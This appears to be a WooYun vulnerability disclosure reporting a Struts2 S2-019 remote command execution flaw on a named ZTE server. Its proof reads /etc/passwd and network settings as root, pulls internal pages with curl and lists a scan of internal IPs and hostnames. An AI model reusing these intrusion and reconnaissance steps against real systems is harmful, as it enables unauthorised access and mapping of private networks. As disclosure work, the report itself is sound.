乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-29: 细节已通知厂商并且等待厂商处理中 2015-10-30: 厂商已经确认,细节仅向厂商公开 2015-11-09: 细节向核心白帽子及相关领域专家公开 2015-11-19: 细节向普通白帽子公开 2015-11-29: 细节向实习白帽子公开 2015-12-14: 细节向公众公开
中兴某服务器存在远程命令执行漏洞(可穿透边界防火墙连通内网)
地址 http://media.moa.zte.com.cn/mpp/MsgView.action 存在远程命令执行root权限
Useage: S2-019 Whoami: rootWebPath: /home/mpp/mpp/
可以为所欲为
ifconfig========================================================================================eth0 Link encap:Ethernet HWaddr 00:50:56:95:69:1A inet addr:10.30.7.188 Bcast:10.30.255.255 Mask:255.255.0.0 inet6 addr: fe80::250:56ff:fe95:691a/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1014612456 errors:0 dropped:0 overruns:0 frame:0 TX packets:69261279 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:89057411709 (82.9 GiB) TX bytes:42866600899 (39.9 GiB)eth9 Link encap:Ethernet HWaddr 00:50:56:95:E1:02 inet addr:10.3.38.71 Bcast:10.3.38.255 Mask:255.255.255.0 inet6 addr: fe80::250:56ff:fe95:e102/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:156889875 errors:0 dropped:0 overruns:0 frame:0 TX packets:141490610 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:34097163769 (31.7 GiB) TX bytes:48721795888 (45.3 GiB)lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:3332551 errors:0 dropped:0 overruns:0 frame:0 TX packets:3332551 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:3960736553 (3.6 GiB) TX bytes:3960736553 (3.6 GiB)
cat /etc/resolv.conf========================================================================================# Generated by NetworkManagernameserver 10.30.1.10cat /etc/hosts========================================================================================127.0.0.1 MPPPRODDB1::1 MPPPRODDB1
cat /etc/passwd========================================================================================root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinrpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologinusbmuxd:x:113:113:usbmuxd user:/:/sbin/nologinabrt:x:173:173::/etc/abrt:/sbin/nologinavahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologinpegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologincimsrvr:x:499:500:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologinhsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologinoprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinrtkit:x:498:495:RealtimeKit:/proc:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinsaslauth:x:497:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinqpidd:x:496:499:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinamandabackup:x:33:6:Amanda user:/var/lib/amanda:/bin/bashmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bashqemu:x:107:107:qemu user:/:/sbin/nologinmemcached:x:495:493:Memcached daemon:/var/run/memcached:/sbin/nologinradvd:x:75:75:radvd user:/:/sbin/nologinavahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologinpulse:x:494:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologingdm:x:42:42::/var/lib/gdm:/sbin/nologintomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologinwebalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinpostgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bashtcpdump:x:72:72::/:/sbin/nologinitadmin:x:500:502:itadmin:/home/itadmin:/bin/bashftpuser:x:501:50::/home/ftpuser:/sbin/nologin
可连通内网某些服务器
curl 10.30.4.22========================================================================================<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Welcome to JBoss™</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <link rel="StyleSheet" href="jboss.css" type="text/css"/></head><body><!-- header begin --> <a href="http://www.jboss.org"> <img src="logo.gif" alt="JBoss" id="logo" width="226" height="105" /> </a> <div id="header"> </div> <div id="navigation_bar"></div><!-- header end --> <h3>JBoss Online Resources</h3> <ul> <li><a href="http://www.jboss.org/products/jbossas/docs">JBoss Documentation</a></li> <li><a href="http://wiki.jboss.org/">JBoss Wiki</a></li> <li><a href="http://jira.jboss.org/">JBoss JIRA</a></li> <li><a href="http://www.jboss.org/index.html?module=bb">JBoss Forums</a></li> </ul> <h3>JBoss Management</h3> <ul> <li><a href="/status">Tomcat status</a> <a href="/status?full=true">(full)</a> <a href="/status?XML=true">(XML)</a></li> <li><a href="/jmx-console/">JMX Console</a></li> <li><a href="/web-console/">JBoss Web Console</a></li> </ul><!-- footer begin --> <div id="footer"> <div id="credits">JBoss™ Application Server</div> <div id="footer_bar"> </div> </div><!-- footer end --></body></html>
到达人事在线
curl hr.zte.com.cn/hronline/login.aspx=======================================================================================<HTML> <HEAD> <title>HRM-HOL人事在线系统</title> <META content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <link href="css/loginEn.css" rel="stylesheet" type="text/css" /> <META http-equiv="Content-Type" content="text/html; charset=gb2312"> <META http-equiv="pragma" content="no-cache"> <META http-equiv="Cache-Control" content="no-cache, must-revalidate"> <META http-equiv="expires" content="0"> <META content="MSHTML 6.00.2800.1479" name="GENERATOR"> <SCRIPT language="javascript" src="/HROnline/Cn_HROnline/js/hidemenu.js" type="text/javascript"></SCRIPT> <SCRIPT language="javaScript" src="/HROnline/Cn_HROnline/js/advv.js" type="text/javascript"></SCRIPT> <SCRIPT language="javascript">Adv("","","","<img src='/HROnline/Cn_HROnline/images/pros.jpg' alt='HROnline' border='0'>","HROnline- 提示信息");</SCRIPT> <SCRIPT language="javascript">Adv("","");</SCRIPT> <script src="js/CollectUserData.js"></script> <script src="js/xxtea.js"></script> </HEAD> <BODY onload="pwdsetfocus()"> <!--------------新界面--------------------> <div class="login" style="FONT-FAMILY: Arial, Helvetica, '宋体',sans-serif"> <div class="login_logo"> <div class="version">V10.3.3</div> <img src="images/login/login_sys_logo.png" width="238" height="49"> </div> <div class="login_area login_dc"> <div id="language"> <label><input type="radio" name="languageSelect" class="radio" value="中文" onclick="javascript:return languageChange2(this)" checked>中文</label> <label><input type="radio" name="languageSelect" class="radio" value="English" onclick="javascript:return languageChange2(this)">English</label> </div> <form name="login" method="post" action="login.aspx" id="login"><input type="hidden" name="hiddenLoginLogOut" id="hiddenLoginLogOut" value="true" /><input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTYzMTQ4NTQwOA9kFgJmD2QWBAIDDw9kFgIeCW9ua2V5ZG93bgULaGlkZWVycm9yKClkAgUPD2QWAh4HT25DbGljawUUcmV0dXJuIHN1Ym1pdEZvcm0oKTtkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQZzdWJtaXR34Eu4e97vJoE8rX+oPKNSj4DFCg==" /><input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBALSkZXuBQLr/4HeAgKyxeCRDwLcu4S2BJ8q0uZtpJpFwn/xxharlvuUUhue" /> <div id="login_input1"> <span class="login_title">用户名</span> <input name="UserId" type="text" id="UserId" title="请输入IC卡号后八位" class="login_txt" onkeydown="keyPressInUser()" name="UserId" /> </div> <div id="login_input2"> <span class="login_title">密 码</span> <input name="PassWord" type="password" id="PassWord" title="请输入密码" class="login_txt" onkeydown="hideerror()" /> </div> <div class="login_help"> <A href="javascript:void(0);" target="_self" onclick="javascript:openhelp(2); return false;" style="POSITION: relative; TOP: -4px">无法登录?</A> <!--<a disabled style="POSITION: relative; TOP: -4px">无法登录?</a>--> <input type="image" name="submit" id="submit" src="/HROnline/images/login/login_btn.png" border="0" onclick="return submitForm();" language="javascript" /></div> </form> </div> <DIV id="loginerror" style="VISIBILITY:hidden" class="wrong_info"><FONT color="red">密码出错,请重新输入密码或与系统管理员联系</FONT></DIV> <div id="dc_login"> <FORM name="form1" action="loginca1.aspx?lang=CN" method="post" cellspacing="0" cellpadding="0" id="form1" onsubmit="return CheckDigiPWD();"> <div id="login_input3"> <span class="login_title">数字证书</span> <INPUT id="txtDigiPwd" class="login_txt" style="WIDTH: 110px" type="password" size="8" name="psw"> </div> <div class="login_help help_dc" align="right"> <A href="javascript:void(0);" target="_self" onclick="javascript:openhelp(1); return false;" style="POSITION: relative; TOP: -4px">无法登录?</A> <INPUT id="Submit_2" type="image" width="45" src="/HROnline/images/login/login_btn.png" value="登录" name="Submit_2"> <input type="hidden" name='Type' id="Type1"> <input type="hidden" name='ReturnUrl' id="ReturnUrl"> </div> </FORM> </div> <div class="login_info info_dc"> <input name="hidPostback" type="hidden" id="hidPostback" value="0" /> <div id="tips" style="BACKGROUND-COLOR: transparent ; font-size: 12px ;color: red;font-weight:500; font-family: Times ">提示:请输入14位工号的后8位和人事在线的密码登录</div> <div id="hotline">如有问题请拨打云服务热线:0755-26778888</div> </div> <div id="login_bottom"> <div id="copyright">©2004-2015 中兴通讯股份有限公司 版权所有</div> </div> <DIV id="help"></DIV> <DIV id="divMess" style="DISPLAY: none"></DIV> <DIV id="divErrorType" style="DISPLAY: none"></DIV> <!--登录出错信息--> <div id="wrong_info_dc" class="wrong_info dc" style="VISIBILITY:hidden"> 请输入数字证书密码! </div> <!--登录出错信息end--> </div> <SCRIPT language="javascript"> var key = 'hol2012'; var lock = false; var lockca = false; //数字证书密码加密 function newEncodeCA() { if (lockca) { return; } var xt = new Xxtea(key); var pwd = document.getElementById("txtDigiPwd"); pwd.value = xt.xxtea_encrypt(pwd.value); lockca = true; } //密码加密 function newEncode() { if (lock) { return; } var xt = new Xxtea(key); var pwd = document.getElementById("PassWord"); pwd.value = xt.xxtea_encrypt(pwd.value); lock = true; } //输入框设定焦点 function pwdsetfocus() { //第一次登录 if ( document.getElementById('hidPostback').value == "0" ) { var isLogOut = document.all["hiddenLoginLogOut"]; if (isLogOut == null) { document.location = "HRMain.aspx?Version=Cn"; return; } } document.login.UserId.value=GetCookie("myusername"); if(document.login.UserId.value == "") { document.login.UserId.focus(); } else { document.login.PassWord.focus(); } } function getQueryString(name) { // 如果链接没有参数,或者链接中不存在我们要获取的参数,直接返回空 if(location.href.indexOf("?")==-1 || location.href.indexOf(name+'=')==-1) { return ''; } // 获取链接中参数部分 var queryString = location.href.substring(location.href.indexOf("?")+1); // 分离参数对 ?key=value&key2=value2 var parameters = queryString.split("&"); var pos, paraName, paraValue; for(var i=0; i<parameters.length; i++) { // 获取等号位置 pos = parameters[i].indexOf('='); if(pos == -1) { continue; } // 获取name 和 value paraName = parameters[i].substring(0, pos); paraValue = parameters[i].substring(pos + 1); // 如果查询的name等于当前name,就返回当前值,同时,将链接中的+号还原成空格 if(paraName == name) { return unescape(paraValue.replace(/\+/g, " ")); } } return ''; } //隐藏错误提示 function hideerror() { if(document.all.loginerror.style.visibility != "hidden") { document.all.loginerror.style.visibility = "hidden"; } } //中英文切换 function languageChange2(obj) { if (obj != null) { var selectedLan = obj.value; switch(selectedLan) { case "中文": location.href("login.aspx?LoginFlag=1"); break; case "English": location.href("Enlogin.aspx?LoginFlag=1"); break; } } } function CheckDigiPWD() { var strPwd = document.getElementById("txtDigiPwd").value; if (strPwd == "") { document.getElementById("loginerror").style.visibility = "hidden"; document.getElementById("wrong_info_dc").style.visibility = ""; //alert("数字证书密码不能为空!"); CheckClick(); return false; } //密码加密 newEncodeCA(); return true; } //无法打开链接 function openhelp(i) { if(i==1) { window.open("http://it.zte.com.cn/ITS/FAQ/FaqDetail.aspx?FaqID=1909408&menuId=120101","FAQ","height=820,top = 20,left=100,menubar=no,location=no,scrollbars=yes"); } else { window.open("http://it.zte.com.cn/ITS/FAQ/FaqDetail.aspx?FaqID=1909403&menuId=120101","FAQ","height=650,top = 20,left=100,menubar=no,location=no,scrollbars=yes"); } return false; } </SCRIPT> <SCRIPT language="JavaScript"> function submitForm() { var value = document.login.UserId.value; SetCookie("myusername", value, 365); //增加密码加密 newEncode(); document.login.submit(); } //用户名文本回车响应 function keyPressInUser() { var keyValue; keyValue=window.event.keyCode; if(keyValue==13) { if(document.login.PassWord.value.length>=6) { submitForm(); } else { document.login.PassWord.focus(); } event.returnValue = false; } } //密码输入框回车响应 function keyPressInPassword() { var keyValue; keyValue=window.event.keyCode; if(keyValue==13) submitForm(); } function CodeCookie(str) { var strRtn=""; for (var i=str.length-1;i>=0;i--) { strRtn+=str.charCodeAt(i); if (i) strRtn+="a"; } return strRtn; } function DecodeCookie(str) { var strArr; var strRtn=""; strArr=str.split("a"); for (var i=strArr.length-1;i>=0;i--) strRtn+=Str
以下是内网探测结果 速度略慢
192.168.170.51 http://job.zte.com.cn/cn/192.168.170.56 https://moa.zte.com.cn/Application/MainFrame/Login.aspx?method=GET192.168.170.60 http://prm.zte.com.cn192.168.170.77 http://epmhk01.zte.com.cn/PME/webprojLogin.jsp192.168.170.103 http://citrix.zte.com.cn10.30.6.17 http://itsm.zte.com.cn/arsys10.30.7.75 http://itop.zte.com.cn10.30.1.212 http://visa.zte.com.cn10.30.1.210 http://pal.zte.com.cn10.30.1.174 http://hr.zte.com.cn/hronline/login.aspx10.30.1.228 http://ecc.zte.com.cn/ecc/login.do
打补丁
危害等级:高
漏洞Rank:12
确认时间:2015-10-30 09:20
感谢对中兴安全的关注
暂无
